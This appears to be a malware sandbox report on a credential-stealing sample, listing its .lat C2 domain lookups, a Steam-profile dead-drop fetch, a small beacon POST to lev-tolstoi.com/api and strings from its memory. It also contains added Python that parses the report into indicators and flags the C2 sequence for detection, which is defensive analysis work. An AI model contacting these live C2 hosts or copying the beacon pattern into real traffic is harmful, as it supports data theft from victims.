      Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
      Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
      Source: global traffic | DNS traffic detected: DNS query: necklacebudi.lat
      Source: global traffic | DNS traffic detected: DNS query: energyaffai.lat
      Source: global traffic | DNS traffic detected: DNS query: aspecteirs.lat
      Source: global traffic | DNS traffic detected: DNS query: sustainskelet.lat
      Source: global traffic | DNS traffic detected: DNS query: rapeflowwj.lat
      Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
      Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknown | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
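The DNS and HTTP entries above, read in order, are the sample's whole C2-selection sequence: eight lookups of disposable .lat domains, then a fetch of a steamcommunity.com profile page with a desktop-Chrome User-Agent (the sample is not a browser; this matches LummaC's documented use of a Steam profile as a dead-drop resolver), then an 8-byte form-encoded POST to /api on lev-tolstoi.com. The Suricata hits are severity 3 JA3-hash alerts, which corroborate but do not convict on their own. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it parses report lines of this shape into IOCs and flags that three-step sequence. The regular expressions, the SAMPLE_LINES list (constructed here from the values listed above), the five-domains-per-TLD threshold and the 16-byte beacon cutoff are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample: lines in the shape of this report's network section,
# assembled here from the values listed above (not a fresh capture).
SAMPLE_LINES = [
    "Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106",
    "Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1",
    "Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - "
    "Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443",
    "Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1"
    "Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com",
    "Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-Alive"
    "Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; "
    "Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
    "Content-Length: 8Host: lev-tolstoi.com",
] + [
    f"Source: global traffic | DNS traffic detected: DNS query: {d}" for d in (
        "crosshuaht.lat", "grannyejh.lat", "discokeyus.lat", "necklacebudi.lat",
        "energyaffai.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat",
        "steamcommunity.com", "lev-tolstoi.com")
]

IP4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
RE_IP = re.compile(r"IP Address: " + IP4)
RE_JA3 = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})")
RE_DNS = re.compile(r"DNS query: ([A-Za-z0-9.-]+)")
RE_IDS = re.compile(r"Suricata IDS: (\d+) - Severity (\d+) - (.+?) : " + IP4 + r":\d+ -> " + IP4 + r":(\d+)")
RE_HTTP = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
RE_HOST = re.compile(r"Host: ([A-Za-z0-9.-]+)")
# Headers are run together in the report, so the UA ends where the next header name starts.
RE_UA = re.compile(r"User-Agent: (.+?)(?:Host:|Content-Length:|Content-Type:|$)")
RE_CLEN = re.compile(r"Content-Length: (\d+)")

# Legitimate service abused as a dead-drop resolver: extract it, never block it.
DEAD_DROP_HOSTS = {"steamcommunity.com"}


def parse_report(lines):
    """Pull IPs, JA3, DNS queries, IDS alerts and HTTP requests out of report lines."""
    iocs = {"ips": set(), "ja3": set(), "dns": [], "ids": [], "http": []}
    for line in lines:
        if m := RE_IP.search(line):
            iocs["ips"].add(m.group(1))
        if m := RE_JA3.search(line):
            iocs["ja3"].add(m.group(1))
        if (m := RE_DNS.search(line)) and m.group(1) not in iocs["dns"]:
            iocs["dns"].append(m.group(1))  # keep query order, drop repeats
        if m := RE_IDS.search(line):
            sid, sev, msg, src, dst, dport = m.groups()
            iocs["ids"].append({"sid": int(sid), "severity": int(sev), "msg": msg.strip(),
                                "src": src, "dst": dst, "dport": int(dport)})
        if m := RE_HTTP.search(line):
            host, ua, clen = RE_HOST.search(line), RE_UA.search(line), RE_CLEN.search(line)
            iocs["http"].append({
                "method": m.group(1), "path": m.group(2),
                "host": host.group(1) if host else "",
                "ua": ua.group(1).strip() if ua else "",
                "content_length": int(clen.group(1)) if clen else None,
            })
    return iocs


def assess(iocs):
    """Flag the three-step C2 selection visible in the report and build block lists."""
    findings = []
    # (1) A burst of distinct domains under one TLD: the built-in C2 list is walked
    #     first; the dead drop is only consulted if none of them answers.
    for tld, n in Counter(d.rsplit(".", 1)[-1] for d in iocs["dns"]).items():
        if n >= 5:  # threshold is an assumption of this example
            findings.append(f"c2-rotation: {n} distinct domains under .{tld}")
    for h in iocs["http"]:
        # (2) GET /profiles/<17-digit SteamID64> with a desktop-Chrome UA: the sample
        #     is not a browser, so this is the dead-drop resolver fetch.
        if h["host"] in DEAD_DROP_HOSTS and re.fullmatch(r"/profiles/\d{17}", h["path"]) \
                and "Chrome/" in h["ua"]:
            findings.append(f"dead-drop: GET {h['host']}{h['path']}")
        # (3) Tiny form-encoded POST to /api on the resolved host: first check-in.
        #     The report shows only Content-Length: 8, not the body.
        elif h["method"] == "POST" and h["host"] not in DEAD_DROP_HOSTS \
                and h["content_length"] is not None and h["content_length"] <= 16:
            findings.append(f"beacon: POST {h['host']}{h['path']} ({h['content_length']} bytes)")
    return {
        "findings": findings,
        "block_domains": [d for d in iocs["dns"] if d not in DEAD_DROP_HOSTS],
        # Observed IPs are most likely shared CDN fronts: record, verify owner, then decide.
        "observed_ips": sorted(iocs["ips"] | {a["dst"] for a in iocs["ids"]}),
        "ja3": sorted(iocs["ja3"]),
        # Severity 3 is low: JA3-hash rules corroborate, they do not convict on their own.
        "low_confidence_alerts": [a["sid"] for a in iocs["ids"] if a["severity"] >= 3],
    }


if __name__ == "__main__":
    for key, value in assess(parse_report(SAMPLE_LINES)).items():
        print(f"{key}: {value}")
```

The matchers search anywhere in the line, so they work whether or not the report's source and detail columns are separated. The block list deliberately excludes steamcommunity.com: the right control for the dead drop is alerting on a non-browser process fetching /profiles/<id>, not blocking Steam.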
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apip
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiv1
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/d
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/outloo
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.s
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
